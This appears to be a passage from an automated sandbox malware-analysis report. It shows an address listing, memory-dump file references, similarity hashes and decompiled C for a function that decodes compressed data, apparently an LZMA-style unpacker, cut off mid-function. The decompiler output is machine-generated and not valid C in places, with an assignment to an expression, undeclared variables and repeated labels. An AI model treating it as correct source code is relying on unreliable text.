                                                                                                            0x00406111
                                                                                                            0x00406114
                                                                                                            0x00406121
                                                                                                            0x00406129
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004060e0
                                                                                                            0x004060e0
                                                                                                            0x004060e4
                                                                                                            0x0040692f
                                                                                                            0x00000000
                                                                                                            0x0040692f
                                                                                                            0x004060f0
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fe
                                                                                                            0x00406101
                                                                                                            0x00406104
                                                                                                            0x00406109
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a6
                                                                                                            0x004067ac
                                                                                                            0x004067b2
                                                                                                            0x004067cc
                                                                                                            0x004067cf
                                                                                                            0x004067d5
                                                                                                            0x004067e0
                                                                                                            0x004067e2
                                                                                                            0x004067b4
                                                                                                            0x004067b4
                                                                                                            0x004067c3
                                                                                                            0x004067c7
                                                                                                            0x004067c7
                                                                                                            0x004067ec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406131
                                                                                                            0x00406133
                                                                                                            0x00406136
                                                                                                            0x004061a7
                                                                                                            0x004061aa
                                                                                                            0x004061ad
                                                                                                            0x004061b4
                                                                                                            0x004061be
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00406138
                                                                                                            0x0040613c
                                                                                                            0x0040613f
                                                                                                            0x00406141
                                                                                                            0x00406144
                                                                                                            0x00406147
                                                                                                            0x00406149
                                                                                                            0x0040614c
                                                                                                            0x0040614e
                                                                                                            0x00406153
                                                                                                            0x00406156
                                                                                                            0x00406159
                                                                                                            0x0040615d
                                                                                                            0x00406164
                                                                                                            0x00406167
                                                                                                            0x0040616e
                                                                                                            0x00406172
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x0040617e
                                                                                                            0x00406181
                                                                                                            0x0040619f
                                                                                                            0x004061a1
                                                                                                            0x00000000
                                                                                                            0x00406183
                                                                                                            0x00406183
                                                                                                            0x00406186
                                                                                                            0x00406189
                                                                                                            0x0040618c
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x00406191
                                                                                                            0x00406194
                                                                                                            0x00406196
                                                                                                            0x00406197
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x004063d0
                                                                                                            0x004063d4
                                                                                                            0x004063f2
                                                                                                            0x004063f5
                                                                                                            0x004063fc
                                                                                                            0x004063ff
                                                                                                            0x00406402
                                                                                                            0x00406405
                                                                                                            0x00406408
                                                                                                            0x0040640b
                                                                                                            0x0040640d
                                                                                                            0x00406414
                                                                                                            0x00406415
                                                                                                            0x00406417
                                                                                                            0x0040641a
                                                                                                            0x0040641d
                                                                                                            0x00406420
                                                                                                            0x00406420
                                                                                                            0x00406425
                                                                                                            0x00000000
                                                                                                            0x00406425
                                                                                                            0x004063d6
                                                                                                            0x004063d9
                                                                                                            0x004063dc
                                                                                                            0x004063e6
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040643a
                                                                                                            0x0040643e
                                                                                                            0x00406461
                                                                                                            0x00406464
                                                                                                            0x00406467
                                                                                                            0x00406471
                                                                                                            0x00406440
                                                                                                            0x00406440
                                                                                                            0x00406443
                                                                                                            0x00406446
                                                                                                            0x00406449
                                                                                                            0x00406456
                                                                                                            0x00406459
                                                                                                            0x00406459
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040647d
                                                                                                            0x00406481
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406487
                                                                                                            0x0040648b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406491
                                                                                                            0x00406493
                                                                                                            0x00406497
                                                                                                            0x00406497
                                                                                                            0x0040649a
                                                                                                            0x0040649e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406515
                                                                                                            0x00406519
                                                                                                            0x00406520
                                                                                                            0x00406523
                                                                                                            0x00406526
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x00406529
                                                                                                            0x0040652c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004065d5
                                                                                                            0x004065d5
                                                                                                            0x004065d9
                                                                                                            0x00406977
                                                                                                            0x00000000
                                                                                                            0x00406977
                                                                                                            0x004065df
                                                                                                            0x004065e2
                                                                                                            0x004065e5
                                                                                                            0x004065e9
                                                                                                            0x004065ec
                                                                                                            0x004065f2
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f7
                                                                                                            0x004065fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061ca
                                                                                                            0x004061ca
                                                                                                            0x004061ce
                                                                                                            0x0040693b
                                                                                                            0x00000000
                                                                                                            0x0040693b
                                                                                                            0x004061d4
                                                                                                            0x004061d7
                                                                                                            0x004061da
                                                                                                            0x004061de
                                                                                                            0x004061e1
                                                                                                            0x004061e7
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061ec
                                                                                                            0x004061ef
                                                                                                            0x004061ef
                                                                                                            0x004061f2
                                                                                                            0x004061f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061fb
                                                                                                            0x00406201
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406207
                                                                                                            0x00406207
                                                                                                            0x0040620b
                                                                                                            0x0040620e
                                                                                                            0x00406211
                                                                                                            0x00406214
                                                                                                            0x00406217
                                                                                                            0x00406218
                                                                                                            0x0040621b
                                                                                                            0x0040621d
                                                                                                            0x00406223
                                                                                                            0x00406226
                                                                                                            0x00406229
                                                                                                            0x0040622c
                                                                                                            0x0040622f
                                                                                                            0x00406232
                                                                                                            0x00406235
                                                                                                            0x00406251
                                                                                                            0x00406254
                                                                                                            0x00406257
                                                                                                            0x0040625a
                                                                                                            0x00406261
                                                                                                            0x00406265
                                                                                                            0x00406267
                                                                                                            0x0040626b
                                                                                                            0x00406237
                                                                                                            0x00406237
                                                                                                            0x0040623b
                                                                                                            0x00406243
                                                                                                            0x00406248
                                                                                                            0x0040624a
                                                                                                            0x0040624c
                                                                                                            0x0040624c
                                                                                                            0x0040626e
                                                                                                            0x00406275
                                                                                                            0x00406278
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x00406283
                                                                                                            0x00406283
                                                                                                            0x00406287
                                                                                                            0x00406947
                                                                                                            0x00000000
                                                                                                            0x00406947
                                                                                                            0x0040628d
                                                                                                            0x00406290
                                                                                                            0x00406293
                                                                                                            0x00406297
                                                                                                            0x0040629a
                                                                                                            0x004062a0
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a5
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004062b0
                                                                                                            0x004062b3
                                                                                                            0x004062b6
                                                                                                            0x004062b9
                                                                                                            0x004062bc
                                                                                                            0x004062bf
                                                                                                            0x004062c2
                                                                                                            0x004062c5
                                                                                                            0x004062c8
                                                                                                            0x004062cb
                                                                                                            0x004062ce
                                                                                                            0x004062e6
                                                                                                            0x004062e9
                                                                                                            0x004062ec
                                                                                                            0x004062ef
                                                                                                            0x004062ef
                                                                                                            0x004062f2
                                                                                                            0x004062f6
                                                                                                            0x004062f8
                                                                                                            0x004062d0
                                                                                                            0x004062d0
                                                                                                            0x004062d8
                                                                                                            0x004062dd
                                                                                                            0x004062df
                                                                                                            0x004062e1
                                                                                                            0x004062e1
                                                                                                            0x004062fb
                                                                                                            0x00406302
                                                                                                            0x00406305
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00406305
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406347
                                                                                                            0x00406347
                                                                                                            0x0040634b
                                                                                                            0x00406953
                                                                                                            0x00000000
                                                                                                            0x00406953
                                                                                                            0x00406351
                                                                                                            0x00406354
                                                                                                            0x00406357
                                                                                                            0x0040635b
                                                                                                            0x0040635e
                                                                                                            0x00406364
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406369
                                                                                                            0x0040636c
                                                                                                            0x0040636c
                                                                                                            0x00406372
                                                                                                            0x00406310
                                                                                                            0x00406310
                                                                                                            0x00406313
                                                                                                            0x00000000
                                                                                                            0x00406313
                                                                                                            0x00406374
                                                                                                            0x00406374
                                                                                                            0x00406377
                                                                                                            0x0040637a
                                                                                                            0x0040637d
                                                                                                            0x00406380
                                                                                                            0x00406383
                                                                                                            0x00406386
                                                                                                            0x00406389
                                                                                                            0x0040638c
                                                                                                            0x0040638f
                                                                                                            0x00406392
                                                                                                            0x004063aa
                                                                                                            0x004063ad
                                                                                                            0x004063b0
                                                                                                            0x004063b3
                                                                                                            0x004063b3
                                                                                                            0x004063b6
                                                                                                            0x004063ba
                                                                                                            0x004063bc
                                                                                                            0x00406394
                                                                                                            0x00406394
                                                                                                            0x0040639c
                                                                                                            0x004063a1
                                                                                                            0x004063a3
                                                                                                            0x004063a5
                                                                                                            0x004063a5
                                                                                                            0x004063bf
                                                                                                            0x004063c6
                                                                                                            0x004063c9
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x00406658
                                                                                                            0x00406658
                                                                                                            0x0040665c
                                                                                                            0x00406983
                                                                                                            0x00000000
                                                                                                            0x00406983
                                                                                                            0x00406662
                                                                                                            0x00406665
                                                                                                            0x00406668
                                                                                                            0x0040666c
                                                                                                            0x0040666f
                                                                                                            0x00406675
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x0040667a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406767
                                                                                                            0x0040676b
                                                                                                            0x0040678d
                                                                                                            0x00406790
                                                                                                            0x0040679a
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x0040676d
                                                                                                            0x00406770
                                                                                                            0x00406774
                                                                                                            0x00406777
                                                                                                            0x00406777
                                                                                                            0x0040677a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406824
                                                                                                            0x00406828
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x0040684d
                                                                                                            0x00406854
                                                                                                            0x0040685b
                                                                                                            0x0040685b
                                                                                                            0x00000000
                                                                                                            0x0040685b
                                                                                                            0x0040682a
                                                                                                            0x0040682d
                                                                                                            0x00406830
                                                                                                            0x00406833
                                                                                                            0x0040683a
                                                                                                            0x0040677e
                                                                                                            0x0040677e
                                                                                                            0x00406781
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406915
                                                                                                            0x00406918
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040654f
                                                                                                            0x00406551
                                                                                                            0x00406558
                                                                                                            0x00406559
                                                                                                            0x0040655b
                                                                                                            0x0040655e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406566
                                                                                                            0x00406569
                                                                                                            0x0040656c
                                                                                                            0x0040656e
                                                                                                            0x00406570
                                                                                                            0x00406570
                                                                                                            0x00406571
                                                                                                            0x00406574
                                                                                                            0x0040657b
                                                                                                            0x0040657e
                                                                                                            0x0040658c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406862
                                                                                                            0x00406862
                                                                                                            0x00406865
                                                                                                            0x0040686c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406871
                                                                                                            0x00406871
                                                                                                            0x00406875
                                                                                                            0x004069ad
                                                                                                            0x00000000
                                                                                                            0x004069ad
                                                                                                            0x0040687b
                                                                                                            0x0040687e
                                                                                                            0x00406881
                                                                                                            0x00406885
                                                                                                            0x00406888
                                                                                                            0x0040688e
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406893
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406899
                                                                                                            0x00406899
                                                                                                            0x0040689d
                                                                                                            0x004068fd
                                                                                                            0x00406900
                                                                                                            0x00406905
                                                                                                            0x00406906
                                                                                                            0x00406908
                                                                                                            0x0040690a
                                                                                                            0x0040690d
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x0040681f
                                                                                                            0x00406819
                                                                                                            0x0040689f
                                                                                                            0x004068a5
                                                                                                            0x004068a8
                                                                                                            0x004068ab
                                                                                                            0x004068ae
                                                                                                            0x004068b1
                                                                                                            0x004068b4
                                                                                                            0x004068b7
                                                                                                            0x004068ba
                                                                                                            0x004068bd
                                                                                                            0x004068c0
                                                                                                            0x004068d9
                                                                                                            0x004068dc
                                                                                                            0x004068df
                                                                                                            0x004068e2
                                                                                                            0x004068e6
                                                                                                            0x004068e8
                                                                                                            0x004068e8
                                                                                                            0x004068e9
                                                                                                            0x004068ec
                                                                                                            0x004068c2
                                                                                                            0x004068c2
                                                                                                            0x004068ca
                                                                                                            0x004068cf
                                                                                                            0x004068d1
                                                                                                            0x004068d4
                                                                                                            0x004068d4
                                                                                                            0x004068ef
                                                                                                            0x004068f6
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x00406594
                                                                                                            0x00406597
                                                                                                            0x004065cd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x00406700
                                                                                                            0x00406700
                                                                                                            0x00406703
                                                                                                            0x00406705
                                                                                                            0x0040698f
                                                                                                            0x00000000
                                                                                                            0x0040698f
                                                                                                            0x0040670b
                                                                                                            0x0040670e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406714
                                                                                                            0x00406718
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x00000000
                                                                                                            0x0040671b
                                                                                                            0x00406599
                                                                                                            0x0040659b
                                                                                                            0x0040659d
                                                                                                            0x0040659f
                                                                                                            0x004065a2
                                                                                                            0x004065a3
                                                                                                            0x004065a5
                                                                                                            0x004065a7
                                                                                                            0x004065aa
                                                                                                            0x004065ad
                                                                                                            0x004065c3
                                                                                                            0x004065c8
                                                                                                            0x00406600
                                                                                                            0x00406600
                                                                                                            0x00406604
                                                                                                            0x00406630
                                                                                                            0x00406632
                                                                                                            0x00406639
                                                                                                            0x0040663c
                                                                                                            0x0040663f
                                                                                                            0x0040663f
                                                                                                            0x00406644
                                                                                                            0x00406644
                                                                                                            0x00406646
                                                                                                            0x00406649
                                                                                                            0x00406650
                                                                                                            0x00406653
                                                                                                            0x00406680
                                                                                                            0x00406680
                                                                                                            0x00406683
                                                                                                            0x00406686
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x00000000
                                                                                                            0x004066fa
                                                                                                            0x00406688
                                                                                                            0x0040668e
                                                                                                            0x00406691
                                                                                                            0x00406694
                                                                                                            0x00406697
                                                                                                            0x0040669a
                                                                                                            0x0040669d
                                                                                                            0x004066a0
                                                                                                            0x004066a3
                                                                                                            0x004066a6
                                                                                                            0x004066a9
                                                                                                            0x004066c2
                                                                                                            0x004066c4
                                                                                                            0x004066c7
                                                                                                            0x004066c8
                                                                                                            0x004066cb
                                                                                                            0x004066cd
                                                                                                            0x004066d0
                                                                                                            0x004066d2
                                                                                                            0x004066d4
                                                                                                            0x004066d7
                                                                                                            0x004066d9
                                                                                                            0x004066dc
                                                                                                            0x004066e0
                                                                                                            0x004066e2
                                                                                                            0x004066e2
                                                                                                            0x004066e3
                                                                                                            0x004066e6
                                                                                                            0x004066e9
                                                                                                            0x004066ab
                                                                                                            0x004066ab
                                                                                                            0x004066b3
                                                                                                            0x004066b8
                                                                                                            0x004066ba
                                                                                                            0x004066bd
                                                                                                            0x004066bd
                                                                                                            0x004066ec
                                                                                                            0x004066f3
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x004066f3
                                                                                                            0x00406606
                                                                                                            0x00406609
                                                                                                            0x0040660b
                                                                                                            0x0040660e
                                                                                                            0x00406611
                                                                                                            0x00406614
                                                                                                            0x00406616
                                                                                                            0x00406619
                                                                                                            0x0040661c
                                                                                                            0x0040661c
                                                                                                            0x0040661f
                                                                                                            0x0040661f
                                                                                                            0x00406622
                                                                                                            0x00406629
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00406629
                                                                                                            0x004065af
                                                                                                            0x004065b2
                                                                                                            0x004065b4
                                                                                                            0x004065b7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406316
                                                                                                            0x00406316
                                                                                                            0x0040631a
                                                                                                            0x0040695f
                                                                                                            0x00000000
                                                                                                            0x0040695f
                                                                                                            0x00406320
                                                                                                            0x00406323
                                                                                                            0x00406326
                                                                                                            0x00406329
                                                                                                            0x0040632c
                                                                                                            0x0040632f
                                                                                                            0x00406332
                                                                                                            0x00406334
                                                                                                            0x00406337
                                                                                                            0x0040633a
                                                                                                            0x0040633d
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064a1
                                                                                                            0x004064a1
                                                                                                            0x004064a5
                                                                                                            0x0040696b
                                                                                                            0x00000000
                                                                                                            0x0040696b
                                                                                                            0x004064ab
                                                                                                            0x004064ae
                                                                                                            0x004064b1
                                                                                                            0x004064b4
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b9
                                                                                                            0x004064bc
                                                                                                            0x004064bf
                                                                                                            0x004064c2
                                                                                                            0x004064c5
                                                                                                            0x004064c8
                                                                                                            0x004064c9
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064ce
                                                                                                            0x004064d1
                                                                                                            0x004064d4
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064da
                                                                                                            0x004064dc
                                                                                                            0x004064dc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x00406722
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406728
                                                                                                            0x0040672b
                                                                                                            0x0040672e
                                                                                                            0x00406731
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406736
                                                                                                            0x00406739
                                                                                                            0x0040673c
                                                                                                            0x0040673f
                                                                                                            0x00406742
                                                                                                            0x00406745
                                                                                                            0x00406746
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x0040674b
                                                                                                            0x0040674e
                                                                                                            0x00406751
                                                                                                            0x00406754
                                                                                                            0x00406757
                                                                                                            0x0040675b
                                                                                                            0x0040675d
                                                                                                            0x00406760
                                                                                                            0x00000000
                                                                                                            0x00406762
                                                                                                            0x004064df
                                                                                                            0x004064df
                                                                                                            0x00000000
                                                                                                            0x004064df
                                                                                                            0x00406760
                                                                                                            0x00406995
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x004069cc
                                                                                                            0x004069cc
                                                                                                            0x00000000
                                                                                                            0x004069cc
                                                                                                            0x00406819
                                                                                                            0x004067a0
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x004064f2

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                            • Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
                                                                                                            • Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                            • Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
